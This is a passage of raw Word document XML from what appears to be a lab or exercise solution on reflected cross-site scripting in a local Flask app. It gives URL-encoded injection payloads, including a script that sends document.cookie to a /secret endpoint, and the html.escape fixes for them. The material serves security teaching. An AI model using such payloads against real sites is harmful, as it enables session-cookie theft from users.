        <w:t>The escaped URL sequence is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757AD28" w14:textId="77777777" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282935B1" w14:textId="61942ED5" w:rsidR="009326E0" w:rsidRDefault="007F165B" w:rsidP="009326E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="009326E0" w:rsidRPr="0085776B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/hello?name=%22attribute=%22aaa%22%3ELink%3C/a%3E%3Cbutton%20onclick=%22alert(%27You%20have%20a%20virus%27)%22%3EClick%20me!%3C/button%3E%3Ca%20href=%22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0503A9C0" w14:textId="77777777" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="009326E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFD8C9C" w14:textId="115AFF49" w:rsidR="009326E0" w:rsidRDefault="008C547A" w:rsidP="009326E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An example of what happens</w:t>
      </w:r>
      <w:r w:rsidR="009326E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC51BC" w14:textId="70A692AD" w:rsidR="008C547A" w:rsidRDefault="008C547A" w:rsidP="009326E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C547A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4155F075" wp14:editId="6A0B830A">
            <wp:extent cx="6120130" cy="646430"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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376F" w14:textId="6B004FE9" w:rsidR="00423FBC" w:rsidRDefault="008C547A" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C547A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CFCB5F" wp14:editId="20B5D734">
            <wp:extent cx="6120130" cy="944880"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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840D" w14:textId="77777777" w:rsidR="00693E1C" w:rsidRDefault="00693E1C" w:rsidP="00693E1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254EFE95" w14:textId="0C142668" w:rsidR="008C547A" w:rsidRDefault="00693E1C" w:rsidP="00693E1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The fix is identical to the previous exercise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1717DE23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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from flask import Flask, request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1A575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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from html import escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F252A94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</w:p>
    <w:p w14:paraId="4FDF6EFE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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1F099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</w:p>
    <w:p w14:paraId="4A67EDC1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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@app.route("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018EC98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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273930C7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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    name = escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request.args.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('name'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5811068D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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    content = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20353B46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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352F9D0F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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;head&gt;&lt;title&gt;Internet knows&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA91DDD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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EBAA30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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            Would you like to know what internet thinks about you? Visit this &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="https://www.bing.com/search?q={}" a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECB380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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;Link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF1AF3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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA9DA3B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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125F03C" w14:textId="77777777" w:rsidR="00693E1C" w:rsidRP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r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    """.format(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E0FBA" w14:textId="6CFC32C6" w:rsid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  <w:r w:rsidRPr="00693E1C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    return content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234BCE2" w14:textId="5C3EF3C1" w:rsid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</w:p>
    <w:p w14:paraId="761A2227" w14:textId="639D39B6" w:rsid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</w:p>
    <w:p w14:paraId="21BBEB96" w14:textId="4149A59F" w:rsidR="00693E1C" w:rsidRDefault="00693E1C" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41638D38" w14:textId="77777777" w:rsidR="00693E1C" w:rsidRPr="00693E1C" w:rsidRDefault="00693E1C" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4EB788" w14:textId="64F09264" w:rsidR="00025960" w:rsidRPr="00CF0327" w:rsidRDefault="00693E1C" w:rsidP="00693E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r w:rsidR="00025960">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976307E" w14:textId="1E8D97E0" w:rsidR="00912A71" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The vulnerability in the previous exercises stays present. To solve the first two points of the exercises, a sample Fetch API request using JS can be made:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39082180" w14:textId="07F9FD07" w:rsidR="001745F3" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA48904" w14:textId="77777777" w:rsidR="009234A5" w:rsidRPr="009234A5" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009234A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009234A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>("http://127.0.0.1:5000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009234A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>secret?cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009234A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009234A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009234A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17507EB7" w14:textId="77777777" w:rsidR="009234A5" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001745F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.then(function(data){return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001745F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001745F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EED47C2" w14:textId="77777777" w:rsidR="009234A5" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001745F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.then(function(data){if (data == 'Congrats!'){console.log("Success")}})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C9AA3" w14:textId="061A02E2" w:rsidR="001745F3" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001745F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.catch(function(data){console.log("failure")})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C7EC99" w14:textId="37CC7C14" w:rsidR="001745F3" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5708CC07" w14:textId="3FBABBEC" w:rsidR="00025960" w:rsidRDefault="001745F3" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This code can be then injected in the </w:t>
      </w:r>
      <w:r w:rsidR="00CF061D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exploitable GET parameter (or bundled in a separate file and added with &lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF061D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF061D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=”…”&gt;) in order to automatize the process.</w:t>
      </w:r>
      <w:r w:rsidR="00025960">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The full URL is the following, complete with escaped characters such as ‘+’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA219C" w14:textId="04481B44" w:rsidR="00025960" w:rsidRDefault="00025960" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4ABF04" w14:textId="2F3F9524" w:rsidR="00025960" w:rsidRDefault="007F165B" w:rsidP="00693E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00A233EC" w:rsidRPr="0085776B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/hello?name=%22attribute=%22aaa%22%3E%3C/a%3E%3Cscript%3Efetch(%22http://127.0.0.1:5000/secret?cookies=%22%2B%0Adocument.cookie).then(function(data){return%20data.text()}).then(function(data){if%20(data%20==%20%27Congrats!%27){console.log(%22Success%22)}}).catch(function(data){console.log(%22failure%22)})%3C/script%3E%3Ca%20href=%22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BCFE3FF" w14:textId="5B9D6F66" w:rsid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</w:p>
    <w:p w14:paraId="5AC13868" w14:textId="3ED91ECC" w:rsidR="00A233EC" w:rsidRDefault="00A233EC" w:rsidP="00A233EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Escaping the name parameter, as usual, fixes the problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C7846E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</w:p>
    <w:p w14:paraId="416A6083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>@app.route("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905683E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>def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CE684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 xml:space="preserve">    global </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>your_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05A4478C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 xml:space="preserve">    name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request.args.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('name')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59876D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 xml:space="preserve">    name = escape(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD119A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</w:p>
    <w:p w14:paraId="358912D8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 xml:space="preserve">    content = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4B066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 xml:space="preserve">    &lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57102147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 xml:space="preserve">        &lt;head&gt;&lt;title&gt;Internet knows&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D99409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 xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610DEAE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 xml:space="preserve">            Would you like to know what internet thinks about you? Visit this &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="https://www.bing.com/search?q={}" a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BA901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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;Link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF6580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 xml:space="preserve">        &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75CD0C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 xml:space="preserve">    &lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58480E6A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 xml:space="preserve">    """.format(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DD62B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 xml:space="preserve">    resp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>make_response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEE0B69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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>your_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2038822E" w14:textId="77777777" w:rsidR="00A233EC" w:rsidRP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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resp.set_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">('auth', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>your_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200DB2E5" w14:textId="59CDD412" w:rsidR="00A233EC" w:rsidRDefault="00A233EC" w:rsidP="00A233EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A233EC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    return resp</w:t>
      </w:r>
    </w:p>
